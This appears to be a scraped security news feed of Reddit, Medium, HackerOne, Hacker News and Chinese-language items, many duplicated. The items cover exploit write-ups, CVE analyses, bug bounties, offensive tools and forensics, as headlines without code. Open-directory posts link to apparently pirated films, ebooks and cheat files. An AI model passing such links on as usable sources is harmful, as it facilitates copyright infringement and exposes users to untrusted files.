    New Zealand’s #1 Bug Bounty Platform is now Inviting the first 500 hackers
    We are preparing to launch Capture The Bug, NZ’s first bug bounty platform. And are welcoming bug hunters from around the world to share… Continue reading on Medium »
  • Open

    ipfs or something?
    These links are cool, but also slow. Is there some way to speed them up or filter down to the ones that are faster? I tried looking for ipfs ones, they were equally slow or broken. there used to be some free to use CDNs, I think coral was one - it's probably mostly dead, but I bet there are new ones based on webrtc data-channel... Or is there just a better place to find specifically this kind of stuff but faster? Remember kodi/xbmc? Did it use directories like these or something quite a bit more organized? submitted by /u/Admirable_Bass_1948 [link] [comments]
    Nope+Prey
    http://37.187.115.51 submitted by /u/caculo [link] [comments]
    Not Sole Admin of Google Unlimited Account - Security
    I recently came across a way to get a google unlimited account on the cheap. it works as it should...though ive been reluctant to use it. Upon reading the terms of service on a shared to me Google Drive account from the Organization Admin; it says the admin has the right to all content, to add or delete....so this raises a huge security question for me... I dont plan on putting anything person in this account. simply rips of content for us all to enjoy, I just wonder if theirs some way the videos files on there could be edited and turned against the other users for the shared google drive. google says they monitor for warez and hacks and such, but who knows how accurate that is. My main concern would be to get keylogged or something like that from simply adding files and playing them occasionally through players. ​ what are your thoughts guys, would love to hear em. found another unlimited storage off seas service that would be a ftp server; which i could work with as well and for this one; i would be admin of the account. little pricier but could be worth it? submitted by /u/AcidAlchamy [link] [comments]
  • Open

    OWASP Network Segmentation Cheat Sheet
    Hi, I write https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets_draft/Network_Segmentation_Cheat_Sheet.md, but it steel in draft mode, can u help? submitted by /u/Marotso [link] [comments]
    Security breach, open to see for anyone - How should I tell?
    Let's suppose that a friend of a friend was wandering around the internet WITHOUT any offensive tools and found out that some idiot has an open HTTP server with all his personal and family photos on it. Let's suppose as well that the friend of my friend couldn't simply mind his own business since it's about the very information safety of a person, and managed to find, between all that data, some sort of contact which could point to that person, by means of the company he works at. Let's add to that that the guy is Russian. ​ How should my friend's friend proceed to tell the guy about it without getting in problems? submitted by /u/drgetbetter [link] [comments]
  • Open

    Announced: Google's OSS Vulnerability Rewards Program
    Article URL: https://security.googleblog.com/2023/08/Announcing-Googles-Open-Source-Software-Vulnerability-Rewards-Program%20.html Comments URL: https://news.ycombinator.com/item?id=32653620 Points: 2 # Comments: 1
  • Open

    TikTok's pixel/sdk.js leaks current URL from websites using postMessage
    TikTok disclosed a bug submitted by fransrosen: https://hackerone.com/reports/1598749 - Bounty: $1500
  • Open

    SecWiki News 2022-08-30 Review
    SecWiki周刊(第443期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-30 Review
    SecWiki周刊(第443期) by ourren 更多最新文章,请访问SecWiki
  • Open

    hackmyvm系列5——Pwned
    本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
    hackmyvm系列6——connection
    本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
    vulnhub系列12—DC 6
    vulnhub系列12—DC 6
    FreeBuf早报 | 美国陆军招募“国家黑客”;特斯拉因幽灵刹车被提起集体诉讼
    美国陆军本周宣布对外招募网络战部队,防御国外政府发动的网络攻击以及防御工作。
    国家卫健委等三部门发布《医疗卫生机构网络安全管理办法》
    《办法》共5章三十四条,分为总则、网络安全管理、数据安全管理、监督管理、管理保障五个大章节,适用于医疗卫生机构运营网络的安全管理。
    美国联邦贸易委员会起诉数据中间商Kochava,涉及售卖上亿手机敏感位置数据
    该诉讼旨在阻止Kochava收集涉及敏感地理位置的数据,并要求该公司删除已经收集的数据。
    如何使用crAPI学习保护API的安全
    crAPI在设计上故意遗留了大量安全漏洞,我们可以通过 crAPI学习和研究API安全。
    hoaxshell:一款功能强大的非传统Windows反向Shell
    该工具不仅可以生成其自己的PowerShell Payload,还支持加密,可以测试Windows系统的安全性。
    暗网上正在出售COVID-19患者数据
    研究人员发现了从泰国医学科学部泄漏的患者个人身份信息(PII),其中包含部分 COVID-19患者的数据信息。
    损失不可估计!网传用友等头部软件厂商遭勒索攻击
    有安全厂商表示,该勒索攻击事件有可能是黑客通过供应链污染或漏洞的方式进行投毒。
  • Open

    Exploiting PrintNightmare (CVE-2021–34527)
    Article URL: https://infosecwriteups.com/exploiting-printnightmare-cve-2021-34527-10c6e0f5b83f?gi=8d08f1a86b88 Comments URL: https://news.ycombinator.com/item?id=32650687 Points: 2 # Comments: 0
  • Open

    Write-up: Authentication bypass via OAuth implicit flow @ PortSwigger Academy
    No content preview
    ‍File Leakage, Blockchain Security, Bypass 2FA, Kerberoasting, Exploiting Security Bugs, and…
    No content preview
    Hack With SQL Injection Attacks! DVWA medium security — StackZero
    No content preview
    AWS Attribute-Based Access Control (ABAC) With Tags
    No content preview
    SSRF — Exploitation 02
    No content preview
  • Open

    Write-up: Authentication bypass via OAuth implicit flow @ PortSwigger Academy
    No content preview
    ‍File Leakage, Blockchain Security, Bypass 2FA, Kerberoasting, Exploiting Security Bugs, and…
    No content preview
    Hack With SQL Injection Attacks! DVWA medium security — StackZero
    No content preview
    AWS Attribute-Based Access Control (ABAC) With Tags
    No content preview
    SSRF — Exploitation 02
    No content preview
  • Open

    Write-up: Authentication bypass via OAuth implicit flow @ PortSwigger Academy
    No content preview
    ‍File Leakage, Blockchain Security, Bypass 2FA, Kerberoasting, Exploiting Security Bugs, and…
    No content preview
    Hack With SQL Injection Attacks! DVWA medium security — StackZero
    No content preview
    AWS Attribute-Based Access Control (ABAC) With Tags
    No content preview
    SSRF — Exploitation 02
    No content preview
  • Open

    What does a CHIEF INFORMATION SECURITY OFFICER (CISO) do?
    This Cybersecurity role is responsible for the IT Security Strategy of the organization. In this article I will describe the role of the… Continue reading on Medium »
    [Repo] Shellcode Loader
    Shellcode, bagi yang sering berinteraksi dengan reverse engineering dan offensive operation (pentest, exploit development, adversary… Continue reading on Reversing.ID »
  • Open

    404星链计划 | 大动作!好多优秀新项目都来加入我们了
    关于星链计划 「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划,这个计划的初衷是将404实验室内部一些工具通过开源的方式发挥其更大的价值,也就是“404星链计划1.0”,这里面有为大家熟知的Pocsuite3、ksubdomain等等,很快我们就收到了许多不错的反馈。2020年11月,我们将目光投向了整个安全圈,以星链计划成员为核心,筛选优质、有意义、有趣、坚持...
    Chrome V8 命令执行漏洞(CVE-2022-1310)分析
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/CBj03EPBlsGe689Lc74qHQ Google于2022年4月11日更新了Chrome的100.0.4896.88,其中修复了由@btiszka在3月18日报告的正则表达式模块的UAF漏洞;6月28日,Google纰漏了该漏洞的具体细节,目前该漏洞已被修复并公开了技术细节,本文将从技...
    基于 RDP 协议识别主机操作系统版本与用户名
    作者:阿布@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/91g9szVMDyXC17u6Vx453A RDP协议(Remote desktop protocol) RDP(remote desktop protocol)桌面远程传输协议,是一个多通道的协议,可以让用户连接上提供微软终端机服务的电脑。RDP协议大部分被应用在Windows操作系统...
  • Open

    404星链计划 | 大动作!好多优秀新项目都来加入我们了
    关于星链计划 「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划,这个计划的初衷是将404实验室内部一些工具通过开源的方式发挥其更大的价值,也就是“404星链计划1.0”,这里面有为大家熟知的Pocsuite3、ksubdomain等等,很快我们就收到了许多不错的反馈。2020年11月,我们将目光投向了整个安全圈,以星链计划成员为核心,筛选优质、有意义、有趣、坚持...
    Chrome V8 命令执行漏洞(CVE-2022-1310)分析
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/CBj03EPBlsGe689Lc74qHQ Google于2022年4月11日更新了Chrome的100.0.4896.88,其中修复了由@btiszka在3月18日报告的正则表达式模块的UAF漏洞;6月28日,Google纰漏了该漏洞的具体细节,目前该漏洞已被修复并公开了技术细节,本文将从技...
    基于 RDP 协议识别主机操作系统版本与用户名
    作者:阿布@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/91g9szVMDyXC17u6Vx453A RDP协议(Remote desktop protocol) RDP(remote desktop protocol)桌面远程传输协议,是一个多通道的协议,可以让用户连接上提供微软终端机服务的电脑。RDP协议大部分被应用在Windows操作系统...

  • Open

    Pentesting on MacBook Pro M1?
    I'm up for a laptop renewal within my company and they sent me the latest MacBook pro. However, only now I realized that the M1 chip only supports ARM (unlike Intel chipset) and I hear people having trouble running windows and Kali virtualization on the Mac using parallels and VMware Fusion. I do all types of testing (internal, web, cloud, mobile, wireless, etc) and primarily use windows commando and Kali VMs for testing. Wondering from anyone going through the same thing as me on how practical it is on the M1 MacBook and do you have trouble running the tools or should I consider returning it and requesting my company to send a Dell windows laptop instead? Thanks. submitted by /u/Pixarnian [link] [comments]
    Second Eyeing SMB Misconfiguration
    Hi All, Looking at an SMB configuration by looking at registry key values of the domain controller. FYI, registry keys is the only source of data I have for now. I want to know based on what I've retrieved if the DCs are vulnerable to any of the SMB vulnerabilities out there. Looking at registry HKLM\System\CurrentControlSet\Services\LanManServer\Parameters\ on multiple DC's, I see that requiresecuritysigniture is an intvalue of 0 which means it is not required. At the same time, enablesecuritysigniture and restricnullaccess is 1 which is good. No SMB1 was found on these servers. So SMB signing looks something like this, atm requiresecuritysigniture = FALSE enablesecuritysigniture = TRUE Now I know smbsigning is important to be enabled, but what confuses me is that according to MS, The EnableSecuritySignature registry setting for SMB2+ client and SMB2+ server is ignored. Therefore, this setting does nothing unless you're using SMB1. SMB2 signing is controlled solely by being required or not. What this tells me is that the enablesecuritysigniture is not entirely relevant here, and requiresecuritysigniture should be the value/parameter of focus? Is it ok for requiresecuritysigniture to be 0, or can NTLM relay still be conducted on this machine or the network? To verify this finding as bad, must I know the workstation/client configurations to see if those are set to 1 on every workstation, basically the group policy setting for clients require a security signature, or can I view this finding as bad in itself? submitted by /u/Inevitable_Star615 [link] [comments]
  • Open

    some NSFW
    submitted by /u/thiskeepsmeupatnight [link] [comments]
  • Open

    Update classes questions
    I am looking to get back into Digital Forensics. I took the Federal Law Enforcement Training Centers computer forensics course back in 2000 and did recoveries etc for several years. That eventually got me on a federal task force where I went undercover for almost a year and arrested 187 offenders. After that, I took a break and did background investigations and later went back into LE investigations. I have done some recovery work etc since then but not a ton. I figure I have to go back and take some new classes as I learned on windows 98. I really don't know what I should take at this point though. I looked at SANS FOR500 but that seems to be more than I need, I also looked into the ISFCE CCE Bootcamp but reviews indicate that some of what they teach is outdated, and not a lot of positions list it as a requirement. I have also seen other certification classes CFCE, EnCase, ACE, etc. I really don't know what I should take to update my skills but keep me from reinventing the wheel. submitted by /u/Playful_Ear203 [link] [comments]
    Took my first practice test.. any tips??
    submitted by /u/Bulevine [link] [comments]
    Autopsy unallocated files - zero bytes on extraction...
    Anyone have any experience of using Autopsy with an image of an old laptop? I can see some files I'm trying to recover - they show as unallocated but when using the right click 'export to' option in Autopsy they end up being zero byte size. Any thoughts on recovery? submitted by /u/stek2022 [link] [comments]
    Android DB Question
    I am trying to identify the DB that would contain information about users that have been blocked on the device. I have found information on the developer android site that it may be in the field "android.provider.BlockedNumberContract" - but I can't find that field in a current dump, so I want to find the DB and parse through to find the blocked users' information. Any ideas? Thanks submitted by /u/GunnyUSMCRockin [link] [comments]
    What's on My DFIR Box?
    Good morning, It’s time for a new 13Cubed episode! By popular request, this episode provides a walkthrough of the hardware and software I utilize for my digital forensic workstation. While this is probably more beneficial for people new to the DFIR field, I suspect it will still be interesting to a wide range of viewers. Episode: https://www.youtube.com/watch?v=-xGfzCT6TUQ Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    Ethernaut CTF walkthrough with Brownie framework
    submitted by /u/Glittering_Audience8 [link] [comments]
    jscythe: Abuse the node.js inspector mechanism to force any node.js/electron/v8 based process to execute arbitrary javascript code.
    submitted by /u/sanitybit [link] [comments]
    Part 1 – SingPass RASP Analysis
    submitted by /u/jeandrew [link] [comments]
    Blind exploits to rule WatchGuard firewalls: pre-auth RCE as root on WG appliances
    submitted by /u/cfambionics [link] [comments]
    A technical analysis of Pegasus for Android – Part 1
    submitted by /u/CyberMasterV [link] [comments]
    Vision2 this script analyses the Nmap XML scanning results parses each CPE context and correlates to search CVE on NIST. You can use that to find public vulnerabilities in services.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Linux Kernel Exploit (CVE-2022-32250) with mqueue
    Article URL: https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Comments URL: https://news.ycombinator.com/item?id=32644120 Points: 1 # Comments: 0
    Blind exploits to rule Watchguard firewalls (CVE-2022-31789, CVE-2022-31790)
    Article URL: https://www.ambionics.io/blog/hacking-watchguard-firewalls Comments URL: https://news.ycombinator.com/item?id=32638687 Points: 1 # Comments: 0
  • Open

    Git object decompress
    Using perl to decompress Git objects. Using "perl -MCompress::Zlib -e 'undef $/; print uncompress()'" and I know it works. When I attempt to decompress one of the tree object, the results are in literal bytes. I was expecting a hash for the blob object, but I get a bunch of ?????ff???1?: 1W?\ Anyways, when I use python3, I get b'tree 69\x004000 code\x00\x9c\xf4f...' at which point I can almost reconstruct the full hash. It's not perfect either. Can anyone shed some light? submitted by /u/derpiestGuy [link] [comments]
    Red Teaming Methodology
    Hi, could you tell me what is the methodology or steps to follow a rem team exercise. Thanks. submitted by /u/Equivalent_Year154 [link] [comments]
    Vision2
    This script analyses the Nmap XML scanning results, parses each CPE context and correlates to search CVE on NIST. You can use that to find public vulnerabilities in services. https://github.com/CoolerVoid/Vision2 submitted by /u/CoolerVoid [link] [comments]
  • Open

    Hack With SQL Injection Attacks! DVWA medium security — StackZero
    In this simple tutorial we are going to keep learn SQL Injection by exploiting DVWA at medium and high security level. Continue reading on InfoSec Write-ups »
    Avaware Audits — Peace Of Mind For Projects & Users
    The end of August is upon us already! The cryptocurrency community feels like it’s waking up from a short slumber compared to the last few… Continue reading on Medium »
    SUBDOMAIN TAKEOVER
    What are Subdomains? Continue reading on Medium »
    Bypassing Amazon WAF to pop an alert()
    Hey everyone, its been a while since I published anything. This time, I’ll be sharing how I bypassed Amazon WAF to get XSS on the target… Continue reading on InfoSec Write-ups »
    How I bypassed Reflected XSS in well-known platform
    What is a XSS attack Continue reading on Medium »
    Bug Bounty For Beginners
    In this version of the Bug Bounty methodology and techniques I use during the recon and fingerprinting phase of an engagement. As you… Continue reading on Medium »
    Learn to Hack Web Apps for Free
    Hello, everyone. I hope everything is going well for you. I am back again with another article and this time I will be guiding you on how… Continue reading on Medium »
    PVR Account Takeover via CSRF
    Hi all Continue reading on Medium »
  • Open

    What is OSINT and how can a SOAR help with that?
    If you’re not familiar with the term “OSINT”, it stands for “Open Source Intelligence”. In a nutshell, it’s any intelligence that can be… Continue reading on Medium »
  • Open

    weak protection against brute-forcing on login api leads to account takeover
    Palo Alto Software disclosed a bug submitted by zer0code: https://hackerone.com/reports/766875
  • Open

    Kerberos Delegation
    Hey friends, it is the 3rd article in my Active Directory Theory and Exploitation series. Today, I would like to talk about 3 types of… Continue reading on Medium »
    What does an ETHICAL HACKER do?
    You want to hack legally? Then become a penetration tester. Continue reading on Medium »
    [Red Series] AMSI Bypass
    Hello all! Continue reading on MII Cyber Security Consulting Services »
  • Open

    SecWiki News 2022-08-29 Review
    [HTB] Jeeves Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-29 Review
    [HTB] Jeeves Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Tor 101: How Tor Works and its Risks to the Enterprise
    People use Tor for both benign and malicious reasons, but allowing Tor traffic on enterprise networks opens the door to security risks. The post Tor 101: How Tor Works and its Risks to the Enterprise appeared first on Unit 42.
  • Open

    Sliver取代Cobalt Strike成黑客渗透工具“新宠”
    开源跨平台工具Sliver正取代Brute Ratel成为受攻击者青睐的武器。
    如何使用jwtXploiter测试JSON Web令牌的安全性
    jwtXploiter可以帮助广大研究测试JSON Web令牌的安全性,并且能够识别所有针对JSON Web令牌的已知CVE漏洞。
    密码管理巨头LastPass遭遇网络攻击,源代码已泄露
    密码管理巨头 LastPass 两周前遭到黑客攻击,可窃取该公司的源代码和专有技术信息。
    FreeBuf早报 | 美国外卖巨头DoorDash发生数据泄露事件;黑客窃取LastPass源代码
    某软件公司法定代表人通过非法控制40余家金融机构的计算机信息系统,最终被执行有期徒刑6年,并处罚金人民币369.8万元。
    Atlassian Bitbucket 服务器和数据中心出现漏洞
    漏洞可能允许攻击者执行恶意代码,Atlassian 目前已经推出了漏洞修复方案。
    借助DDoS,LockBit勒索软件正变得更加凶险
    LockBit表示正着手改进对DDoS攻击的防御,以应对来自安全机构的攻击,并借此来大力提高自身勒索能力。
  • Open

    Bypassing Amazon WAF to pop an alert()
    No content preview
    Definitive Guide to SQL Injection
    Introduction Continue reading on InfoSec Write-ups »
    Secure Messaging
    Confidentiality, Reliability, Privacy, Usability, Cross-Platform support… — So many things to consider! Continue reading on InfoSec Write-ups »
    Double free() attacks in ARM Part one.
    No content preview
    Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator
    No content preview
  • Open

    Bypassing Amazon WAF to pop an alert()
    No content preview
    Definitive Guide to SQL Injection
    Introduction Continue reading on InfoSec Write-ups »
    Secure Messaging
    Confidentiality, Reliability, Privacy, Usability, Cross-Platform support… — So many things to consider! Continue reading on InfoSec Write-ups »
    Double free() attacks in ARM Part one.
    No content preview
    Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator
    No content preview
  • Open

    Bypassing Amazon WAF to pop an alert()
    No content preview
    Definitive Guide to SQL Injection
    Introduction Continue reading on InfoSec Write-ups »
    Secure Messaging
    Confidentiality, Reliability, Privacy, Usability, Cross-Platform support… — So many things to consider! Continue reading on InfoSec Write-ups »
    Double free() attacks in ARM Part one.
    No content preview
    Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator
    No content preview
  • Open

    通过动态链接库绕过反病毒软件 Hook - Break JVM
    作者:倾旋 原文链接:https://payloads.online/archivers/2022-08-11/1/ 通常情况下获得Java Webshell碰到数字杀毒的场景居多,在这个环境中经常会遇到无法执行命令或命令被拦截的情况,很多小伙伴遇到这个问题就劝退了,我猜测是有一套进程链的检测方式导致了命令无法执行,于是去查看Java的文档,查阅到Java能够加载动态链接库且能够执行动态链接...
    CVE-2021-22600 通过 Modprobe_path 及 USMA 进行漏洞利用与分析
    作者: knaithe@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/gu6O-ZSIiVpNJP1I9O94wQ 漏洞描述:漏洞位于/net/packet/af_packet.c文件,rx_owner_map引用了pg_vec,切换到TPACKET_V3协议版本中,在packet_set_ring()函数的末尾,对pg_vec释放了一次,并未对rx_ow...
    Ruby 安全漫谈
    作者:NiuBL@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/ECLwMbbrf9lWXkhbUergXg 随着Ruby越来越流行,Ruby相关的安全问题也逐渐暴露,目前,国内专门介绍Ruby安全的文章较少,本文结合笔者所了解的Ruby安全知识点以及挖掘到的Ruby相关漏洞进行描述,希望能给读者在Ruby代码审计上提供帮助。 Ruby简介 Ru...
    Cisco RV340 wfapp 命令注入漏洞(CVE-2022-20827)分析
    作者:Rivaille@知道创宇404实验室 日期:2022年8月29日 漏洞原理 这个漏洞是cisco RV340和cisco RV160系列中存在的一个命令注入漏洞,命令注入发生在wfapp中,漏洞原理如下。 wfapp运行后会检查当前/tmp/webrootdb目录下是否存在webfilter数据库文件,如果存在,则不向服务器发送更新数据库的请求,如果不存在,则会拉取更新。同时wfap...
  • Open

    通过动态链接库绕过反病毒软件 Hook - Break JVM
    作者:倾旋 原文链接:https://payloads.online/archivers/2022-08-11/1/ 通常情况下获得Java Webshell碰到数字杀毒的场景居多,在这个环境中经常会遇到无法执行命令或命令被拦截的情况,很多小伙伴遇到这个问题就劝退了,我猜测是有一套进程链的检测方式导致了命令无法执行,于是去查看Java的文档,查阅到Java能够加载动态链接库且能够执行动态链接...
    CVE-2021-22600 通过 Modprobe_path 及 USMA 进行漏洞利用与分析
    作者: knaithe@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/gu6O-ZSIiVpNJP1I9O94wQ 漏洞描述:漏洞位于/net/packet/af_packet.c文件,rx_owner_map引用了pg_vec,切换到TPACKET_V3协议版本中,在packet_set_ring()函数的末尾,对pg_vec释放了一次,并未对rx_ow...
    Ruby 安全漫谈
    作者:NiuBL@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/ECLwMbbrf9lWXkhbUergXg 随着Ruby越来越流行,Ruby相关的安全问题也逐渐暴露,目前,国内专门介绍Ruby安全的文章较少,本文结合笔者所了解的Ruby安全知识点以及挖掘到的Ruby相关漏洞进行描述,希望能给读者在Ruby代码审计上提供帮助。 Ruby简介 Ru...
    Cisco RV340 wfapp 命令注入漏洞(CVE-2022-20827)分析
    作者:Rivaille@知道创宇404实验室 日期:2022年8月29日 漏洞原理 这个漏洞是cisco RV340和cisco RV160系列中存在的一个命令注入漏洞,命令注入发生在wfapp中,漏洞原理如下。 wfapp运行后会检查当前/tmp/webrootdb目录下是否存在webfilter数据库文件,如果存在,则不向服务器发送更新数据库的请求,如果不存在,则会拉取更新。同时wfap...

  • Open

    ‮Phishin!
    How threat actors and ethical hackers are utilising the right-to-left override character to masquerade phishing payloads. Continue reading on Medium »
  • Open

    Looking for Slack / Discord servers to help exchange experience
    I enjoy discussions on cybersecurity, and I'm wondering if you know of any discord servers or slack channels for that... Thanks in advance!! submitted by /u/karimhabush [link] [comments]
    Personal data collection sites
    Hi! I know this is more of a r/privacy question but mods removed it and suggested I post it on here :( Besides this sub, I really have no idea where else to go. So the thing is that about 2 years ago I stumbled across some company's site that said it collected data about people be it on Fb/Ig and even a bit beyond search engines. Iirc I think that it's main job was to harvest data for further data science upon them for marketing purposes etc. and then sell them to bigger companies that rely on that data. Because I'm an EU citizen, I was eligible for getting a copy of all the data they have on me. The site required ID document verification but I didn't do it at that time. I'm really dying to get to know this site a past few months but without success. I'd really like that personal data now to see what's gathered beyond some search engine results. Anyone knows about this one? Thanks! submitted by /u/friderik [link] [comments]
    What is server_name in nginx?
    In nginx configuration file, can we define the server_name on our own? Or there is some specific value to the server_name? #cybersecurity #infosec submitted by /u/mkkedia3 [link] [comments]
  • Open

    Huge collection of Academic Textbooks in Portuguese
    submitted by /u/afmachado [link] [comments]
    Huge collection of books, fantasy, self-help, classics, sci-fi, books in Magyar and etc
    https://zfelleg.useribm.hu/unsorted/ebooks/source/ submitted by /u/AnnoyingRomanian [link] [comments]
    Korean? and Hollywood movies (in Korean probably)
    http://dogjdw.ipdisk.co.kr/public/VOL1/public/movie/ submitted by /u/RainyAbrar [link] [comments]
    (first post) Free robux? robux indeed, we robux robux ah yes robux robux? robux hax robux?
    Actually though has some cheat files, seems like this person scans the internet for files and presses them into directories for whaterver, random images, couple good wallpapers actually. MArked as nsfw since it's massive. https://www.js100.com/uploads/ckeditor/files/ submitted by /u/BitterSweetcandyshop [link] [comments]
    buriedbits Mac software
    submitted by /u/the_real_nirv [link] [comments]
  • Open

    How To Write A Penetration Testing Report
    A Penetration testing report is the only tangible product. Continue reading on Medium »
    Clickjacking Vulnerability
    What is clickjacking Continue reading on Medium »
    Unsubscribe any user’s e-mail notifications via IDOR
    IDOR allows attacker to unsubscribe any user from the Websites email service. Continue reading on Medium »
    Server Side Request Forgery (SSRF) Attacks
    Server-side request forgery (SSRF) attacks exploit software vulnerabilities that could allow an attacker to trick the server-side… Continue reading on Medium »
    Redline Stealer
    The Redline Stealer Continue reading on Medium »
    Nuclei for Bug Bounties Hunters
    Nuclei is used to send requests across targets based on a template, providing fast scanning on a large number of hosts. Continue reading on Medium »
    OWASP: The Open Web Application Security Project
    The Open Web Application Security Project (OWASP) is a non-profit foundation dedicated to improving software security. Continue reading on Medium »
    DoS and DDoS attacks
    Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks are malicious attempts ton disrupt the normal operations of a… Continue reading on Medium »
  • Open

    SecWiki News 2022-08-28 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-28 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Break me out of sandbox in old pipe: CVE-2022-22715 Windows Dirty Pipe
    Article URL: https://whereisk0shl.top/post/break-me-out-of-sandbox-in-old-pipe-cve-2022-22715-windows-dirty-pipe Comments URL: https://news.ycombinator.com/item?id=32628094 Points: 2 # Comments: 1
  • Open

    Dr. Chaos – A structured fuzzing framework in Nim
    Article URL: https://github.com/status-im/nim-drchaos Comments URL: https://news.ycombinator.com/item?id=32627934 Points: 58 # Comments: 7
  • Open

    Anti-Digital Forensics resources
    Hi everyone, do you know any resources about the latest and state-of-the-art anti-digital forensics techniques and/or tools? submitted by /u/zr0_day [link] [comments]
    IOS forensics. Evidence of phone unlocked to phone locked again?
    No experience with IOS forensics. Work has me in Windows and Linux but a personal matter came up and I need to see if someone was using my SOs iPhone for an extended period of time. Screen time shows they were in Messages but I’m looking for hard evidence of the phone was unlocked from x time to x time or evidence of messages accessed (guessing that’s a no). Is this doable with iPhone forensics and can someone point me towards a resource on how to go about obtaining that data? submitted by /u/P1zza0fD3ath [link] [comments]
  • Open

    SPY NEWS: 2022 — Week 34
    Summary of the espionage-related news stories for the Week 34 (August 21–27) of 2022. Continue reading on Medium »
  • Open

    Jekyll Cheatsheet
    Introduction Jekyll은 Hugo, Hexo와 함께 굉장히 많이 사용되는 SSG(Static Site Genertor) 입니다. Ruby로 개발되었고 Liquid 문법을 사용하여 템플릿을 통제할 수 있고, 여러가지 기능들 담은 Gem(RubyGem)을 추가하여 쉽게 여러가지 기능들을 만들어낼 수 있습니다. Directory Structure _config.yml: Jekyll 사이트이 Config 파일입니다. Jekyll에서 사용할 변수, 옵션 등 여러가지 설정이 이 파일에 포함됩니다. _posts: 기본적인 Post 디렉토리입니다. 대다수 테마에선 블로그 글과 같이 날짜로 정렬되는 데이터가 여기에 포함됩니다. _pages: 기본적인 Page 디렉토리입니다. Gemfile: Ruby Gemfile입니다. Jekyll plugin 또한 Gem 파일에 명시하여 설치할 수 있습니다. 참고로 config.yml에 exclude로 제외한 디렉토리를 빼면 _ 가 붙은 디렉토리는 사이트에 포함되지 않고 없는 디렉토리는 내용 자체가 포함됩니다. 그래서 만약 _data란 디렉토리를 만들고 별도로 site에 포함(output: true)시키지 않는다면 사이트에 들어가지 않습니다. 그래서 빌드에서만 사용할 데이터를 별도로 넣고 관리할 수도 있습니다. Usage Basic jekyll new: 사이트를 생성합니다. jekyll new-theme: 테마를 생성합니다. jekyll serve, server, s: jekyll 사이트를 로컬에서 구동합니다. jekyll build: 사이트를 빌드합니다. (_site 경로에 static file들이 생성됩니다.) jekyll doctor, hyde: Warnings가 있는지 체크합니다. 주로 사용되는건 위와 같으며 이외에 여러가지 subcommands는 jekyll -h로 확인하실 수 있습니다. Advanced - Jekyll Compose Jekyll Compose 설치 시 Jekeyll Command에서 글을 쓰고 관리하는 기능들이 추가됩니다. 이 명령으로 생성한 페이지들은 Front matter의 일부가 자동으로 작성됩니다. Front matter 또한 사용자가 직접 원하는 포맷으로 설정이 가능합니다. bundle exec jekyll...
  • Open

    On Cryptocurrency Wallet Design – defines access control taxonomy, can be reused e.g. for MFA factors
    submitted by /u/D4r1 [link] [comments]
    SATisfying our way into remote code execution in the OPC UA industrial stack
    submitted by /u/SRMish3 [link] [comments]
  • Open

    TCP Socket Listen: A Tale of Two Queues
    TL; DR This post digs into the design and implementation of the TCP listen queues in Linux kernel. Hope that after reading through this post, readers will have a deeper understanding about the underlying working mechanism of TCP/socket listening and 3-way handshaking, as well as related kernel configurations and performance tunings. Fig. The "SYN queue" and accept queue of a listening state TCP socket TL; DR 1 Introduction 1.1 Why listen queues? 1.2 Technical requirements for (server-side) 3WHS implementation [1] 1.3 Where are the queues in Linux kernel code? 1.4 Purpose of this post 2 Fundamentals: socket related data structures 2.1 Classification of socket related structs 2.2 Connection request related structs 2.2.1 struct request_sock:a (proto agnostic) connection reque…

  • Open

    Where does BitLocker store its main encryption key?
    Does BitLocker store it's encryption key in memory? submitted by /u/pozazero [link] [comments]
    Audio file being used as evidence has section removed.
    I have an ongoing case where approximately 6 seconds of audio is removed. I tried to look at metadata myself. Assuming I’m looking at the right thing it appears suspicious.. but perhaps that’s just basic coding? Can anyone tell me what I would be looking for or willing to help look at it.. is there a way to bring back what was removed from the audio .wav file? submitted by /u/DigConsistent8437 [link] [comments]
  • Open

    Namecheap vulnerability they refuse to fix: no 2FA on support portal login
    Article URL: https://crimew.gay/notice/AMxFUTYtsMNtzbDzQu Comments URL: https://news.ycombinator.com/item?id=32623356 Points: 7 # Comments: 3
  • Open

    Phishing: Não morda essa isca!
    Neste artigo vou caminhar com você na tentativa de responder as seguintes perguntas: O que é? Por que ainda é tão recorrente? Quais são os… Continue reading on Medium »
    Active methods for identifying Telegram users in OSINT
    Active OSINT-methods to identify the user of the Telegram messenger, owners and administrators of communities implies a legendary access… Continue reading on Medium »
    A Beginner’s Guide to Investigating Vessels and Sanctions Using Maltego
    If you are new to Maltego, you can check out my other blog here for getting started with the installation of the free Maltego Community… Continue reading on Medium »
  • Open

    SSRF — The Server’s Loophole 01
    No content preview
    Server Side Template Injections Portswiggers Labs Walkthrough Part III
    No content preview
    ‍$7000 Bounty, Web3 Bug Hunting, API Hacking, IDOR, Triggering XSS with emojis, XSS Flyer, and…
    No content preview
    SSRF leads to access AWS metadata.
    No content preview
